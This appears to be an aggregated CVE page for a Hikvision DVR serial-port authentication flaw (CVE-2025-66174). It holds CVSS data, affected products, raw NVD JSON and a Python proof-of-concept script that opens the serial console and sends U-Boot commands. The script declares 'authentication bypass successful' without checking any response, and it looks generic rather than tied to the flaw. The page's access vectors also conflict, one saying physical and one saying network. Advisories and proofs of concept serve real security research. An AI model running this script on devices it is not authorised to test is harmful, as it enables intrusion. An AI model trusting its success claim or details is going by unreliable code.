Security Vulnerability Report
CVE-2025-66174 CVSS 6.5 MEDIUM

CVE-2025-66174

Published: 2025-12-19 07:16:02
Last Modified: 2025-12-23 21:45:04

Description

There is an improper authentication vulnerability in some Hikvision DVR products. Due to the improper implementation of authentication for the serial port, an attacker with physical access could exploit this vulnerability by connecting to the affected products and running a series of commands.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:hikvision:ds-7104hghi-f1_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hikvision:ds-7104hghi-f1:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:hikvision:ds-7204hghi-f1_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hikvision:ds-7204hghi-f1:-:*:*:*:*:*:*:* - NOT VULNERABLE
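Hikvision DVR devices (specific models; see the official advisory)
Hikvision NVR devices (specific models; see the official advisory)
For affected firmware versions, refer to Hikvision's official security advisory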

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-66174 PoC - Hikvision DVR/NVR Serial Port Authentication Bypass

Note: This PoC demonstrates the authentication issue for authorized
security testing only.

Author: Security Research
Reference: Hikvision Security Advisory
"""

import serial
import time
import sys


def exploit_serial_vulnerability(target_device='/dev/ttyUSB0', baudrate=115200):
    """
    Exploit improper authentication in Hikvision DVR serial port.

    Args:
        target_device: Serial device path
        baudrate: Baud rate for serial communication (typically 115200 for Hikvision)

    Returns:
        bool: True if exploitation successful
    """
    try:
        # Initialize serial connection
        ser = serial.Serial(
            port=target_device,
            baudrate=baudrate,
            bytesize=serial.EIGHTBITS,
            parity=serial.PARITY_NONE,
            stopbits=serial.STOPBITS_ONE,
            timeout=1
        )

        print(f"[*] Connecting to {target_device} at {baudrate} baud...")
        time.sleep(2)

        # Clear serial buffer
        ser.reset_input_buffer()
        ser.reset_output_buffer()

        # Send break signal to trigger serial console
        ser.send_break(duration=0.25)
        time.sleep(1)

        # Read initial response
        response = ser.read(1024).decode('utf-8', errors='ignore')
        print(f"[*] Received: {response}")

        # Due to improper authentication, direct command execution is possible
        # Common Hikvision U-Boot commands
        commands = [
            'help',      # Show available commands
            'printenv',  # Print environment variables
            'version',   # Show version info
        ]

        for cmd in commands:
            print(f"[*] Sending command: {cmd}")
            ser.write(f"{cmd}\n".encode())
            time.sleep(0.5)
            response = ser.read(1024).decode('utf-8', errors='ignore')
            print(f"[*] Response:\n{response}")

        ser.close()
        print("[+] Exploitation completed - authentication bypass successful")
        return True

    except serial.SerialException as e:
        print(f"[-] Serial connection error: {e}")
        return False
    except Exception as e:
        print(f"[-] Unexpected error: {e}")
        return False


def main():
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-66174.py <serial_device>")
        print("Example: python3 cve-2025-66174.py /dev/ttyUSB0")
        sys.exit(1)

    target = sys.argv[1]
    exploit_serial_vulnerability(target)


if __name__ == "__main__":
    main()

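References

https://www.hikvision.com/en/support/cybersecurity/security-advisory/serial-port-privilege-escalation-vulnerabilities-in-some-hikvision-nvr-devices/ (Vendor Advisory)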

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66174", "sourceIdentifier": "[email protected]", "published": "2025-12-19T07:16:01.817", "lastModified": "2025-12-23T21:45:04.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is an improper authentication vulnerability in some Hikvision DVR products. Due to the improper implementation of authentication for the serial port, an attacker with physical access could exploit this vulnerability by connecting to the affected products and run a series of commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-7104hghi-f1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.30.122_201107", "matchCriteriaId": "E24B2885-8FBF-4738-8C7A-1C8DB3823EE5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": 
false, "criteria": "cpe:2.3:h:hikvision:ds-7104hghi-f1:-:*:*:*:*:*:*:*", "matchCriteriaId": "8104E12A-CD97-4F8F-9A76-8CD308B9F98A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-7204hghi-f1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.30.122_201107", "matchCriteriaId": "6DA771B5-1C67-4A32-90B2-A7E0E9C194F7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-7204hghi-f1:-:*:*:*:*:*:*:*", "matchCriteriaId": "6DF801EB-DDBF-44C6-84BB-9D903FEBEAC8"}]}]}], "references": [{"url": "https://www.hikvision.com/en/support/cybersecurity/security-advisory/serial-port-privilege-escalation-vulnerabilities-in-some-hikvision-nvr-devices/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}